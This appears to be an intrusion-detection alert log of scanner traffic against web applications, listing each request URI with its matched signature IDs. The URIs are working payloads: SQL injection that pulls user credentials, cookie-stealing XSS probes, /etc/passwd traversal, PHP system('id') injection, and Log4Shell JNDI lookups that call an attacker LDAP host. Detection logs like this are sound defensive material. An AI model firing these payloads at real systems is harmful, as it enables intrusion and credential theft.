Packet [6398]	Uri [/show_profile.php?custid=1+and+1=0+union+select+1,0x53514c2d496e6a656374696f6e2d54657374,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66--+]	Nattacks [1]	Signatures	[2006446]
Packet [6399]	Uri [/cgi-bin/show_profile.php?custid=1+and+1=0+union+select+1,0x53514c2d496e6a656374696f6e2d54657374,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66--+]	Nattacks [1]	Signatures	[2006446]
Packet [6400]	Uri [/web/show_profile.php?custid=1+and+1=0+union+select+1,0x53514c2d496e6a656374696f6e2d54657374,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66--+]	Nattacks [1]	Signatures	[2006446]
Packet [6446]	Uri [/blog/public/view.php?storyid=-1%27%20UNION%20ALL%20SELECT%201,2,132323231,4,5,6,7,8,9,10%23]	Nattacks [1]	Signatures	[2006446]
Packet [6447]	Uri [/ezblog/public/view.php?storyid=-1%27%20UNION%20ALL%20SELECT%201,2,132323231,4,5,6,7,8,9,10%23]	Nattacks [1]	Signatures	[2006446]
Packet [6448]	Uri [/public/view.php?storyid=-1%27%20UNION%20ALL%20SELECT%201,2,132323231,4,5,6,7,8,9,10%23]	Nattacks [1]	Signatures	[2006446]
Packet [6449]	Uri [/cgi-bin/public/view.php?storyid=-1%27%20UNION%20ALL%20SELECT%201,2,132323231,4,5,6,7,8,9,10%23]	Nattacks [1]	Signatures	[2006446]
Packet [6450]	Uri [/web/public/view.php?storyid=-1%27%20UNION%20ALL%20SELECT%201,2,132323231,4,5,6,7,8,9,10%23]	Nattacks [1]	Signatures	[2006446]
Packet [6451]	Uri [/facil-cms/modules.php?modload=Albums&op=photo&id=-1+UNION+SELECT+1,2,3,0x53514c2d496e6a656374696f6e2d54657374%20--]	Nattacks [1]	Signatures	[2006446]
Packet [6452]	Uri [/cms/modules.php?modload=Albums&op=photo&id=-1+UNION+SELECT+1,2,3,0x53514c2d496e6a656374696f6e2d54657374%20--]	Nattacks [1]	Signatures	[2006446]
Packet [6453]	Uri [/modules.php?modload=Albums&op=photo&id=-1+UNION+SELECT+1,2,3,0x53514c2d496e6a656374696f6e2d54657374%20--]	Nattacks [1]	Signatures	[2006446]
Packet [6454]	Uri [/cgi-bin/modules.php?modload=Albums&op=photo&id=-1+UNION+SELECT+1,2,3,0x53514c2d496e6a656374696f6e2d54657374%20--]	Nattacks [1]	Signatures	[2006446]
Packet [6455]	Uri [/web/modules.php?modload=Albums&op=photo&id=-1+UNION+SELECT+1,2,3,0x53514c2d496e6a656374696f6e2d54657374%20--]	Nattacks [1]	Signatures	[2006446]
Packet [6457]	Uri [/fom.cgi?cmd=<script>foo</script>&file=1&keywords=vt-test]	Nattacks [1]	Signatures	[2009714]
Packet [6458]	Uri [/fom/fom.cgi?cmd=<script>foo</script>&file=1&keywords=vt-test]	Nattacks [1]	Signatures	[2009714]
Packet [6459]	Uri [/cgi-bin/fom.cgi?cmd=<script>foo</script>&file=1&keywords=vt-test]	Nattacks [1]	Signatures	[2009714]
Packet [6460]	Uri [/web/fom.cgi?cmd=<script>foo</script>&file=1&keywords=vt-test]	Nattacks [1]	Signatures	[2009714]
Packet [6461]	Uri [/fcgi-bin/echo?foo=<SCRIPT>alert(document.domain)</SCRIPT>]	Nattacks [1]	Signatures	[2009714]
Packet [6462]	Uri [/fcgi-bin/echo2?foo=<SCRIPT>alert(document.domain)</SCRIPT>]	Nattacks [1]	Signatures	[2009714]
Packet [6485]	Uri [/frontend/js.php?module=../../../../../../../../../../../../../../../../../../etc/passwd%00&file=frontend.js&language=en]	Nattacks [1]	Signatures	[2014324]
Packet [6486]	Uri [/cgi-bin/frontend/js.php?module=../../../../../../../../../../../../../../../../../../etc/passwd%00&file=frontend.js&language=en]	Nattacks [1]	Signatures	[2014324]
Packet [6487]	Uri [/web/frontend/js.php?module=../../../../../../../../../../../../../../../../../../etc/passwd%00&file=frontend.js&language=en]	Nattacks [1]	Signatures	[2014324]
Packet [6516]	Uri [/tombstone.cfm?ProfileID=<script>foo</script>]	Nattacks [1]	Signatures	[2009714]
Packet [6517]	Uri [/cgi-bin/tombstone.cfm?ProfileID=<script>foo</script>]	Nattacks [1]	Signatures	[2009714]
Packet [6518]	Uri [/web/tombstone.cfm?ProfileID=<script>foo</script>]	Nattacks [1]	Signatures	[2009714]
Packet [6523]	Uri [/photos/search.php?dosearch=true&query="><script>alert(document.cookie)</script>]	Nattacks [1]	Signatures	[2009714]
Packet [6524]	Uri [/gallery/search.php?dosearch=true&query="><script>alert(document.cookie)</script>]	Nattacks [1]	Signatures	[2009714]
Packet [6525]	Uri [/search.php?dosearch=true&query="><script>alert(document.cookie)</script>]	Nattacks [1]	Signatures	[2009714]
Packet [6526]	Uri [/cgi-bin/search.php?dosearch=true&query="><script>alert(document.cookie)</script>]	Nattacks [1]	Signatures	[2009714]
Packet [6527]	Uri [/web/search.php?dosearch=true&query="><script>alert(document.cookie)</script>]	Nattacks [1]	Signatures	[2009714]
Packet [6951]	Uri [/cgi-bin/${jndi:ldap://192.168.133.137:11730/a}]	Nattacks [2]	Signatures	[58722]	[58744]
Packet [6958]	Uri [/index.php?a=19&c=</div><script>alert(/openvasvt/);</script>]	Nattacks [1]	Signatures	[2009714]
Packet [6959]	Uri [/cgi-bin/index.php?a=19&c=</div><script>alert(/openvasvt/);</script>]	Nattacks [1]	Signatures	[2009714]
Packet [6960]	Uri [/web/index.php?a=19&c=</div><script>alert(/openvasvt/);</script>]	Nattacks [1]	Signatures	[2009714]
Packet [6962]	Uri [/news/?group_id=&limit=50&offset=50;select+1+as+id,unix_pw+as+forum_id,+user_name||unix_pw+as+summary+from+users]	Nattacks [2]	Signatures	[2006445]	[2010963]
Packet [6963]	Uri [/cgi-bin/news/?group_id=&limit=50&offset=50;select+1+as+id,unix_pw+as+forum_id,+user_name||unix_pw+as+summary+from+users]	Nattacks [2]	Signatures	[2006445]	[2010963]
Packet [6964]	Uri [/web/news/?group_id=&limit=50&offset=50;select+1+as+id,unix_pw+as+forum_id,+user_name||unix_pw+as+summary+from+users]	Nattacks [2]	Signatures	[2006445]	[2010963]
Packet [6965]	Uri [/amazon/search.php?query=1<script>alert(document.cookie);</script>&mode=all]	Nattacks [1]	Signatures	[2009714]
Packet [6966]	Uri [/search.php?query=1<script>alert(document.cookie);</script>&mode=all]	Nattacks [1]	Signatures	[2009714]
Packet [6967]	Uri [/cgi-bin/search.php?query=1<script>alert(document.cookie);</script>&mode=all]	Nattacks [1]	Signatures	[2009714]
Packet [6968]	Uri [/web/search.php?query=1<script>alert(document.cookie);</script>&mode=all]	Nattacks [1]	Signatures	[2009714]
Packet [6980]	Uri [/cgi-bin/${jndi:ldap://kali:11730/a}]	Nattacks [2]	Signatures	[58722]	[58744]
Packet [7030]	Uri [/cgi-bin/${jndi:ldap://127.0.0.1#192.168.133.137:11730/a}]	Nattacks [2]	Signatures	[58722]	[58744]
Packet [7090]	Uri [/cgi-bin/${jndi:ldap://127.0.0.1#kali:11730/a}]	Nattacks [2]	Signatures	[58722]	[58744]
Packet [7162]	Uri [/cgi-bin/${jndi:ldap://localhost#192.168.133.137:11730/a}]	Nattacks [2]	Signatures	[58722]	[58744]
Packet [7249]	Uri [/cgi-bin/${jndi:ldap://localhost#kali:11730/a}]	Nattacks [2]	Signatures	[58722]	[58744]
Packet [7305]	Uri [/cgi-bin/?param=${jndi:ldap://192.168.133.137:11730/a}]	Nattacks [2]	Signatures	[58722]	[58744]
Packet [7372]	Uri [/cgi-bin/?param=${jndi:ldap://kali:11730/a}]	Nattacks [2]	Signatures	[58722]	[58744]
Packet [7465]	Uri [/cgi-bin/?param=${jndi:ldap://127.0.0.1#192.168.133.137:11730/a}]	Nattacks [2]	Signatures	[58722]	[58744]
Packet [7549]	Uri [/cgi-bin/?param=${jndi:ldap://127.0.0.1#kali:11730/a}]	Nattacks [2]	Signatures	[58722]	[58744]
Packet [7621]	Uri [/cgi-bin/?param=${jndi:ldap://localhost#192.168.133.137:11730/a}]	Nattacks [2]	Signatures	[58722]	[58744]
Packet [7699]	Uri [/cgi-bin/?param=${jndi:ldap://localhost#kali:11730/a}]	Nattacks [2]	Signatures	[58722]	[58744]
Packet [7935]	Uri [/tmUnblock.cgi]	Nattacks [1]	Signatures	[2018132]
Packet [7936]	Uri [/tmUnblock.cgi]	Nattacks [1]	Signatures	[2018132]
Packet [7937]	Uri [/tmUnblock.cgi]	Nattacks [1]	Signatures	[2018132]
Packet [7938]	Uri [/tmUnblock.cgi]	Nattacks [1]	Signatures	[2018132]
Packet [7939]	Uri [/tmUnblock.cgi]	Nattacks [1]	Signatures	[2018132]
Packet [7940]	Uri [/tmUnblock.cgi]	Nattacks [1]	Signatures	[2018132]
Packet [7941]	Uri [/tmUnblock.cgi]	Nattacks [1]	Signatures	[2018132]
Packet [7942]	Uri [/tmUnblock.cgi]	Nattacks [1]	Signatures	[2018132]
Packet [7943]	Uri [/tmUnblock.cgi]	Nattacks [1]	Signatures	[2018132]
Packet [7944]	Uri [/tmUnblock.cgi]	Nattacks [1]	Signatures	[2018132]
Packet [7945]	Uri [/tmUnblock.cgi]	Nattacks [1]	Signatures	[2018132]
Packet [7946]	Uri [/tmUnblock.cgi]	Nattacks [1]	Signatures	[2018132]
Packet [7947]	Uri [/tmUnblock.cgi]	Nattacks [1]	Signatures	[2018132]
Packet [7948]	Uri [/tmUnblock.cgi]	Nattacks [1]	Signatures	[2018132]
Packet [7949]	Uri [/tmUnblock.cgi]	Nattacks [1]	Signatures	[2018132]
Packet [7950]	Uri [/tmUnblock.cgi]	Nattacks [1]	Signatures	[2018132]
Packet [7951]	Uri [/phppath/php]	Nattacks [1]	Signatures	[2016983]
Packet [7952]	Uri [/phppath/php]	Nattacks [1]	Signatures	[2016983]
Packet [7953]	Uri [/phppath/php]	Nattacks [1]	Signatures	[2016983]
Packet [7954]	Uri [/phppath/php]	Nattacks [1]	Signatures	[2016983]
Packet [7955]	Uri [/phppath/php]	Nattacks [1]	Signatures	[2016983]
Packet [7956]	Uri [/phppath/php]	Nattacks [1]	Signatures	[2016983]
Packet [7957]	Uri [/phppath/php]	Nattacks [1]	Signatures	[2016983]
Packet [7958]	Uri [/phppath/php]	Nattacks [1]	Signatures	[2016983]
Packet [7959]	Uri [/phppath/php]	Nattacks [1]	Signatures	[2016983]
Packet [7960]	Uri [/phppath/php]	Nattacks [1]	Signatures	[2016983]
Packet [7961]	Uri [/phppath/php]	Nattacks [1]	Signatures	[2016983]
Packet [7962]	Uri [/phppath/php]	Nattacks [1]	Signatures	[2016983]
Packet [7963]	Uri [/phppath/php]	Nattacks [1]	Signatures	[2016983]
Packet [7964]	Uri [/phppath/php]	Nattacks [1]	Signatures	[2016983]
Packet [7965]	Uri [/phppath/php]	Nattacks [1]	Signatures	[2016983]
Packet [7966]	Uri [/phppath/php]	Nattacks [1]	Signatures	[2016983]
Packet [8054]	Uri [/goollery/viewpic.php?id=7&conversation_id=<script>foo</script>&btopage=0]	Nattacks [1]	Signatures	[2009714]
Packet [8055]	Uri [/viewpic.php?id=7&conversation_id=<script>foo</script>&btopage=0]	Nattacks [1]	Signatures	[2009714]
Packet [8056]	Uri [/cgi-bin/viewpic.php?id=7&conversation_id=<script>foo</script>&btopage=0]	Nattacks [1]	Signatures	[2009714]
Packet [8057]	Uri [/web/viewpic.php?id=7&conversation_id=<script>foo</script>&btopage=0]	Nattacks [1]	Signatures	[2009714]
Packet [8084]	Uri [/hesk/language/en/text.php/<script>alert('openvasvt');</script>]	Nattacks [1]	Signatures	[2009714]
Packet [8085]	Uri [/help/language/en/text.php/<script>alert('openvasvt');</script>]	Nattacks [1]	Signatures	[2009714]
Packet [8086]	Uri [/helpdesk/language/en/text.php/<script>alert('openvasvt');</script>]	Nattacks [1]	Signatures	[2009714]
Packet [8087]	Uri [/language/en/text.php/<script>alert('openvasvt');</script>]	Nattacks [1]	Signatures	[2009714]
Packet [8088]	Uri [/cgi-bin/language/en/text.php/<script>alert('openvasvt');</script>]	Nattacks [1]	Signatures	[2009714]
Packet [8089]	Uri [/web/language/en/text.php/<script>alert('openvasvt');</script>]	Nattacks [1]	Signatures	[2009714]
Packet [8101]	Uri [/htsearch.cgi?words=%22%3E%3Cscript%3Efoo%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [8102]	Uri [/cgi-bin/htsearch.cgi?words=%22%3E%3Cscript%3Efoo%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [8103]	Uri [/web/htsearch.cgi?words=%22%3E%3Cscript%3Efoo%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [8115]	Uri [/IBSng/util/show_multistr.php?str=%3Cscript%3Ealert(/ovas-xss-test/)%3C/script%3E]	Nattacks [2]	Signatures	[2009714]	[2013871]
Packet [8116]	Uri [/cgi-bin/IBSng/util/show_multistr.php?str=%3Cscript%3Ealert(/ovas-xss-test/)%3C/script%3E]	Nattacks [2]	Signatures	[2009714]	[2013871]
Packet [8117]	Uri [/web/IBSng/util/show_multistr.php?str=%3Cscript%3Ealert(/ovas-xss-test/)%3C/script%3E]	Nattacks [2]	Signatures	[2009714]	[2013871]
Packet [8155]	Uri [/newcomment/?ArticleId="><script>foo</script>]	Nattacks [1]	Signatures	[2009714]
Packet [8156]	Uri [/cgi-bin/newcomment/?ArticleId="><script>foo</script>]	Nattacks [1]	Signatures	[2009714]
Packet [8157]	Uri [/web/newcomment/?ArticleId="><script>foo</script>]	Nattacks [1]	Signatures	[2009714]
Packet [8207]	Uri [/index.php?gadget=Glossary&action=ViewTerm&term=%3cscript%3ealert('openvasvt441470578')%3b%3c%2fscript%3e]	Nattacks [1]	Signatures	[2009714]
Packet [8208]	Uri [/index.php?gadget=Glossary&action=view&term=%3cscript%3ealert('openvasvt441470578')%3b%3c%2fscript%3e]	Nattacks [1]	Signatures	[2009714]
Packet [8209]	Uri [/cgi-bin/index.php?gadget=Glossary&action=ViewTerm&term=%3cscript%3ealert('openvasvt441470578')%3b%3c%2fscript%3e]	Nattacks [1]	Signatures	[2009714]
Packet [8210]	Uri [/cgi-bin/index.php?gadget=Glossary&action=view&term=%3cscript%3ealert('openvasvt441470578')%3b%3c%2fscript%3e]	Nattacks [1]	Signatures	[2009714]
Packet [8211]	Uri [/web/index.php?gadget=Glossary&action=ViewTerm&term=%3cscript%3ealert('openvasvt441470578')%3b%3c%2fscript%3e]	Nattacks [1]	Signatures	[2009714]
Packet [8212]	Uri [/web/index.php?gadget=Glossary&action=view&term=%3cscript%3ealert('openvasvt441470578')%3b%3c%2fscript%3e]	Nattacks [1]	Signatures	[2009714]
Packet [8215]	Uri [/jobs/browse.php?pk=-1%20union%20select%201234567,2--]	Nattacks [3]	Signatures	[19438]	[2006446]	[2009730]
Packet [8216]	Uri [/browse.php?pk=-1%20union%20select%201234567,2--]	Nattacks [3]	Signatures	[19438]	[2006446]	[2009730]
Packet [8217]	Uri [/cgi-bin/browse.php?pk=-1%20union%20select%201234567,2--]	Nattacks [3]	Signatures	[19438]	[2006446]	[2009730]
Packet [8218]	Uri [/web/browse.php?pk=-1%20union%20select%201234567,2--]	Nattacks [3]	Signatures	[19438]	[2006446]	[2009730]
Packet [8220]	Uri [/joomla/index.php?option=com_joomradio&page=show_video&id=-1%20UNION%20SELECT%20user%28%29,concat%28username,0x3a,password%29,user%28%29,user%28%29,user%28%29,user%28%29,user%28%29%20FROM%20jos_users--]	Nattacks [6]	Signatures	[19438]	[2006445]	[2006446]	[2010963]	[2011042]	[2015984]
Packet [8221]	Uri [/cms/index.php?option=com_joomradio&page=show_video&id=-1%20UNION%20SELECT%20user%28%29,concat%28username,0x3a,password%29,user%28%29,user%28%29,user%28%29,user%28%29,user%28%29%20FROM%20jos_users--]	Nattacks [6]	Signatures	[19438]	[2006445]	[2006446]	[2010963]	[2011042]	[2015984]
Packet [8223]	Uri [/index.php?option=com_joomradio&page=show_video&id=-1%20UNION%20SELECT%20user%28%29,concat%28username,0x3a,password%29,user%28%29,user%28%29,user%28%29,user%28%29,user%28%29%20FROM%20jos_users--]	Nattacks [6]	Signatures	[19438]	[2006445]	[2006446]	[2010963]	[2011042]	[2015984]
Packet [8224]	Uri [/cgi-bin/index.php?option=com_joomradio&page=show_video&id=-1%20UNION%20SELECT%20user%28%29,concat%28username,0x3a,password%29,user%28%29,user%28%29,user%28%29,user%28%29,user%28%29%20FROM%20jos_users--]	Nattacks [6]	Signatures	[19438]	[2006445]	[2006446]	[2010963]	[2011042]	[2015984]
Packet [8225]	Uri [/web/index.php?option=com_joomradio&page=show_video&id=-1%20UNION%20SELECT%20user%28%29,concat%28username,0x3a,password%29,user%28%29,user%28%29,user%28%29,user%28%29,user%28%29%20FROM%20jos_users--]	Nattacks [6]	Signatures	[19438]	[2006445]	[2006446]	[2010963]	[2011042]	[2015984]
Packet [8227]	Uri [/page.php?xPage=<script>alert(document.cookie)</script>]	Nattacks [1]	Signatures	[2009714]
Packet [8228]	Uri [/cgi-bin/page.php?xPage=<script>alert(document.cookie)</script>]	Nattacks [1]	Signatures	[2009714]
Packet [8229]	Uri [/web/page.php?xPage=<script>alert(document.cookie)</script>]	Nattacks [1]	Signatures	[2009714]
Packet [8234]	Uri [/index.php?_a=knowledgebase&_j=search&searchm=<script>alert(document.cookie)</script>]	Nattacks [1]	Signatures	[2009714]
Packet [8235]	Uri [/support/esupport/index.php?_a=knowledgebase&_j=search&searchm=<script>alert(document.cookie)</script>]	Nattacks [1]	Signatures	[2009714]
Packet [8236]	Uri [/support/index.php?_a=knowledgebase&_j=search&searchm=<script>alert(document.cookie)</script>]	Nattacks [1]	Signatures	[2009714]
Packet [8237]	Uri [/cgi-bin/index.php?_a=knowledgebase&_j=search&searchm=<script>alert(document.cookie)</script>]	Nattacks [1]	Signatures	[2009714]
Packet [8238]	Uri [/web/index.php?_a=knowledgebase&_j=search&searchm=<script>alert(document.cookie)</script>]	Nattacks [1]	Signatures	[2009714]
Packet [8240]	Uri [/dms/slideshow.kspx?source=<script>foo</script>]	Nattacks [1]	Signatures	[2009714]
Packet [8241]	Uri [/dms/dlasx.kspx?shidx=<script>foo</script>]	Nattacks [1]	Signatures	[2009714]
Packet [8242]	Uri [/igen/?pg=dlasx.kspx&shidx=<script>foo</script>]	Nattacks [1]	Signatures	[2009714]
Packet [8243]	Uri [/dms/mediashowplay.kspx?pic=<script>foo</script>&idx=0]	Nattacks [1]	Signatures	[2009714]
Packet [8244]	Uri [/dms/mediashowplay.kspx?pic=0&idx=<script>foo</script>]	Nattacks [1]	Signatures	[2009714]
Packet [8258]	Uri [/cms/index.php?id=-1'%20UNION%20SELECT%201,2,3,0x53514c2d496e6a656374696f6e2d54657374,5,6,7,8,9,10,11,12,13--+]	Nattacks [1]	Signatures	[2006446]
Packet [8259]	Uri [/lasernet/index.php?id=-1'%20UNION%20SELECT%201,2,3,0x53514c2d496e6a656374696f6e2d54657374,5,6,7,8,9,10,11,12,13--+]	Nattacks [1]	Signatures	[2006446]
Packet [8260]	Uri [/index.php?id=-1'%20UNION%20SELECT%201,2,3,0x53514c2d496e6a656374696f6e2d54657374,5,6,7,8,9,10,11,12,13--+]	Nattacks [1]	Signatures	[2006446]
Packet [8261]	Uri [/cgi-bin/index.php?id=-1'%20UNION%20SELECT%201,2,3,0x53514c2d496e6a656374696f6e2d54657374,5,6,7,8,9,10,11,12,13--+]	Nattacks [1]	Signatures	[2006446]
Packet [8262]	Uri [/web/index.php?id=-1'%20UNION%20SELECT%201,2,3,0x53514c2d496e6a656374696f6e2d54657374,5,6,7,8,9,10,11,12,13--+]	Nattacks [1]	Signatures	[2006446]
Packet [8268]	Uri [/index2.php?_SERVER[]=&_SERVER[REMOTE_ADDR]='.system('id').exit().'&option=wrapper&module[module]=1]	Nattacks [1]	Signatures	[2017436]
Packet [8269]	Uri [/cgi-bin/index2.php?_SERVER[]=&_SERVER[REMOTE_ADDR]='.system('id').exit().'&option=wrapper&module[module]=1]	Nattacks [1]	Signatures	[2017436]
Packet [8270]	Uri [/web/index2.php?_SERVER[]=&_SERVER[REMOTE_ADDR]='.system('id').exit().'&option=wrapper&module[module]=1]	Nattacks [1]	Signatures	[2017436]
Packet [8419]	Uri [/mollify/backend/plugin/Registration/index.php?confirm=%3Cscript%3Ealert(%27openvasvt%27)%3C/script%3E]	Nattacks [1]	Signatures	[2009714]
Packet [8420]	Uri [/backend/plugin/Registration/index.php?confirm=%3Cscript%3Ealert(%27openvasvt%27)%3C/script%3E]	Nattacks [1]	Signatures	[2009714]
Packet [8421]	Uri [/cgi-bin/backend/plugin/Registration/index.php?confirm=%3Cscript%3Ealert(%27openvasvt%27)%3C/script%3E]	Nattacks [1]	Signatures	[2009714]
Packet [8422]	Uri [/web/backend/plugin/Registration/index.php?confirm=%3Cscript%3Ealert(%27openvasvt%27)%3C/script%3E]	Nattacks [1]	Signatures	[2009714]
Packet [8429]	Uri [/wiki.php/<script>foo</script>]	Nattacks [1]	Signatures	[2009714]
Packet [8430]	Uri [/cgi-bin/wiki.php/<script>foo</script>]	Nattacks [1]	Signatures	[2009714]
Packet [8431]	Uri [/web/wiki.php/<script>foo</script>]	Nattacks [1]	Signatures	[2009714]
Packet [8444]	Uri [/EsContacts/login.php?msg=<script>alert(document.cookie);</script>]	Nattacks [1]	Signatures	[2009714]
Packet [8445]	Uri [/EsBaseAdmin/default/login.php?msg=<script>alert(document.cookie);</script>]	Nattacks [1]	Signatures	[2009714]
Packet [8446]	Uri [/EsPartenaires/login.php?msg=<script>alert(document.cookie);</script>]	Nattacks [1]	Signatures	[2009714]
Packet [8447]	Uri [/EsNews/admin/news/modifier.php?msg=<script>alert(document.cookie);</script>]	Nattacks [1]	Signatures	[2009714]
Packet [8449]	Uri [/cgi-bin/readfile.cgi?query=ADMINID]	Nattacks [1]	Signatures	[39930]
Packet [8461]	Uri [/results.php?searchtype=">%3cscript%3ealert('openvasvt215169675')%3b%3c%2fscript%3ecategory&searchterm=OpenVASVT]	Nattacks [1]	Signatures	[2009714]
Packet [8462]	Uri [/cgi-bin/results.php?searchtype=">%3cscript%3ealert('openvasvt215169675')%3b%3c%2fscript%3ecategory&searchterm=OpenVASVT]	Nattacks [1]	Signatures	[2009714]
Packet [8463]	Uri [/web/results.php?searchtype=">%3cscript%3ealert('openvasvt215169675')%3b%3c%2fscript%3ecategory&searchterm=OpenVASVT]	Nattacks [1]	Signatures	[2009714]
Packet [8470]	Uri [/search=%3Cscript%3Ealert('XSS')%3C/script%3E]	Nattacks [1]	Signatures	[2009714]
Packet [8471]	Uri [/cgi-bin/search=%3Cscript%3Ealert('XSS')%3C/script%3E]	Nattacks [1]	Signatures	[2009714]
Packet [8472]	Uri [/web/search=%3Cscript%3Ealert('XSS')%3C/script%3E]	Nattacks [1]	Signatures	[2009714]
Packet [8481]	Uri [/portal/ajaxp_backend.php?page=-1+union+select+1,0x53514c2d496e6a656374696f6e2d54657374,3,4,5,6,7--]	Nattacks [2]	Signatures	[2006446]	[2009424]
Packet [8482]	Uri [/ajaxp_backend.php?page=-1+union+select+1,0x53514c2d496e6a656374696f6e2d54657374,3,4,5,6,7--]	Nattacks [2]	Signatures	[2006446]	[2009424]
Packet [8483]	Uri [/cgi-bin/ajaxp_backend.php?page=-1+union+select+1,0x53514c2d496e6a656374696f6e2d54657374,3,4,5,6,7--]	Nattacks [2]	Signatures	[2006446]	[2009424]
Packet [8484]	Uri [/web/ajaxp_backend.php?page=-1+union+select+1,0x53514c2d496e6a656374696f6e2d54657374,3,4,5,6,7--]	Nattacks [2]	Signatures	[2006446]	[2009424]
Packet [8485]	Uri [/email.php?forum_contact="><script>foo</script>]	Nattacks [1]	Signatures	[2009714]
Packet [8486]	Uri [/forum/email.php?forum_contact="><script>foo</script>]	Nattacks [1]	Signatures	[2009714]
Packet [8487]	Uri [/cgi-bin/email.php?forum_contact="><script>foo</script>]	Nattacks [1]	Signatures	[2009714]
Packet [8488]	Uri [/web/email.php?forum_contact="><script>foo</script>]	Nattacks [1]	Signatures	[2009714]
Packet [8502]	Uri [/index.php?err=3&email=<script>foo</script>]	Nattacks [1]	Signatures	[2009714]
Packet [8503]	Uri [/cgi-bin/index.php?err=3&email=<script>foo</script>]	Nattacks [1]	Signatures	[2009714]
Packet [8504]	Uri [/web/index.php?err=3&email=<script>foo</script>]	Nattacks [1]	Signatures	[2009714]
Packet [8535]	Uri [/netjukebox/message.php?skin="><script>alert(/openvasvt/)</script>]	Nattacks [1]	Signatures	[2009714]
Packet [8536]	Uri [/message.php?skin="><script>alert(/openvasvt/)</script>]	Nattacks [1]	Signatures	[2009714]
Packet [8537]	Uri [/cgi-bin/message.php?skin="><script>alert(/openvasvt/)</script>]	Nattacks [1]	Signatures	[2009714]
Packet [8538]	Uri [/web/message.php?skin="><script>alert(/openvasvt/)</script>]	Nattacks [1]	Signatures	[2009714]
Packet [8553]	Uri [/nqt.php?target=127.0.0.1&queryType=all&portNum=foobar%3Cscript%3Efoo%3C/script%3E]	Nattacks [1]	Signatures	[2009714]
Packet [8554]	Uri [/nqt/nqt.php?target=127.0.0.1&queryType=all&portNum=foobar%3Cscript%3Efoo%3C/script%3E]	Nattacks [1]	Signatures	[2009714]
Packet [8555]	Uri [/cgi-bin/nqt.php?target=127.0.0.1&queryType=all&portNum=foobar%3Cscript%3Efoo%3C/script%3E]	Nattacks [1]	Signatures	[2009714]
Packet [8556]	Uri [/web/nqt.php?target=127.0.0.1&queryType=all&portNum=foobar%3Cscript%3Efoo%3C/script%3E]	Nattacks [1]	Signatures	[2009714]
Packet [8559]	Uri [/nforum/showtheme.php?id=-1%27%20UNION%20ALL%20SELECT%201,2,CONCAT(name,%200x3a,%20passwd_hash),NULL,5,6,7%20FROM%20users%23]	Nattacks [4]	Signatures	[2006445]	[2006446]	[2010963]	[2011042]
Packet [8560]	Uri [/forum/showtheme.php?id=-1%27%20UNION%20ALL%20SELECT%201,2,CONCAT(name,%200x3a,%20passwd_hash),NULL,5,6,7%20FROM%20users%23]	Nattacks [4]	Signatures	[2006445]	[2006446]	[2010963]	[2011042]
Packet [8561]	Uri [/board/showtheme.php?id=-1%27%20UNION%20ALL%20SELECT%201,2,CONCAT(name,%200x3a,%20passwd_hash),NULL,5,6,7%20FROM%20users%23]	Nattacks [4]	Signatures	[2006445]	[2006446]	[2010963]	[2011042]
Packet [8562]	Uri [/showtheme.php?id=-1%27%20UNION%20ALL%20SELECT%201,2,CONCAT(name,%200x3a,%20passwd_hash),NULL,5,6,7%20FROM%20users%23]	Nattacks [4]	Signatures	[2006445]	[2006446]	[2010963]	[2011042]
Packet [8563]	Uri [/cgi-bin/showtheme.php?id=-1%27%20UNION%20ALL%20SELECT%201,2,CONCAT(name,%200x3a,%20passwd_hash),NULL,5,6,7%20FROM%20users%23]	Nattacks [4]	Signatures	[2006445]	[2006446]	[2010963]	[2011042]
Packet [8564]	Uri [/web/showtheme.php?id=-1%27%20UNION%20ALL%20SELECT%201,2,CONCAT(name,%200x3a,%20passwd_hash),NULL,5,6,7%20FROM%20users%23]	Nattacks [4]	Signatures	[2006445]	[2006446]	[2010963]	[2011042]
Packet [8587]	Uri [/index.php?file=Liens&op="><script>window.alert('test');</script>]	Nattacks [1]	Signatures	[2009714]
Packet [8588]	Uri [/cgi-bin/index.php?file=Liens&op="><script>window.alert('test');</script>]	Nattacks [1]	Signatures	[2009714]
Packet [8589]	Uri [/web/index.php?file=Liens&op="><script>window.alert('test');</script>]	Nattacks [1]	Signatures	[2009714]
Packet [8614]	Uri [/cms/index.php?load=elite&view=1%3C/title%3E%3Cscript%3Ealert(%27openvasvt%27)%3C/script%3E]	Nattacks [1]	Signatures	[2009714]
Packet [8615]	Uri [/index.php?load=elite&view=1%3C/title%3E%3Cscript%3Ealert(%27openvasvt%27)%3C/script%3E]	Nattacks [1]	Signatures	[2009714]
Packet [8616]	Uri [/cgi-bin/index.php?load=elite&view=1%3C/title%3E%3Cscript%3Ealert(%27openvasvt%27)%3C/script%3E]	Nattacks [1]	Signatures	[2009714]
Packet [8617]	Uri [/web/index.php?load=elite&view=1%3C/title%3E%3Cscript%3Ealert(%27openvasvt%27)%3C/script%3E]	Nattacks [1]	Signatures	[2009714]
Packet [8625]	Uri [/openbb/board.php?FID=%3Cscript%3Efoo%3C/script%3E]	Nattacks [1]	Signatures	[2009714]
Packet [8626]	Uri [/board.php?FID=%3Cscript%3Efoo%3C/script%3E]	Nattacks [1]	Signatures	[2009714]
Packet [8627]	Uri [/cgi-bin/board.php?FID=%3Cscript%3Efoo%3C/script%3E]	Nattacks [1]	Signatures	[2009714]
Packet [8628]	Uri [/web/board.php?FID=%3Cscript%3Efoo%3C/script%3E]	Nattacks [1]	Signatures	[2009714]
Packet [8690]	Uri [/pfile/kommentar.php?filecat="><script>alert(/xss-test/)</script>&fileid=0]	Nattacks [1]	Signatures	[2009714]
Packet [8691]	Uri [/kommentar.php?filecat="><script>alert(/xss-test/)</script>&fileid=0]	Nattacks [1]	Signatures	[2009714]
